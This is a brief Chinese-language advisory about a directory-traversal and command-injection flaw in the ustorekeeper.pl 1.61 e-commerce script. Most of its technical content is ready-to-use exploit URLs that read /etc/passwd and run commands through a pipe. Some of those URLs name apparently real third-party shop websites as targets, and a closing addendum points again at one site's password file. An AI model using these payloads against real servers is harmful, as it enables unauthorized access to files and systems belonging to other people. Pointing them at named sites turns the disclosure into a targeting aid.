ustorekeeper.pl 验证信息漏洞

/ns/ld/softld/data/20010406110957.htm

ustorekeeper.pl 验证信息漏洞

涉及程序:
ustorekeeper.pl

描述:
构造特殊的 URL 导致 ustorekeeper.pl 泄露文件信息漏洞

详细:
USTOREKEEPER 是一个电子商务完全解决方案。其出售商网址在 http://www.uburst.com 。发现 USTOREKEEPER 存在漏洞,当攻击者提交如“..”和“/”之类的特殊符号时, USTOREKEEPER 不能正确过滤它们。利用这个漏洞,攻击者能取得远程服务器上的一些敏感信息文件。
以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负


Exploit: http://www.vulnurable.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../etc/hosts http://www.vulnurable.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../bin/ls |
Example: http://www.lynchs.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd http://www.madamealexanderdollmuseum.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../../../../bin/cat%20ustorekeeper.pl|

受影响版本:
ustorekeeper.pl version 1.61



SQL补充:用下面可以看到对方的PASSWD文件。
http://www.madamealexanderdollmuseum.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../../../../etc/passwd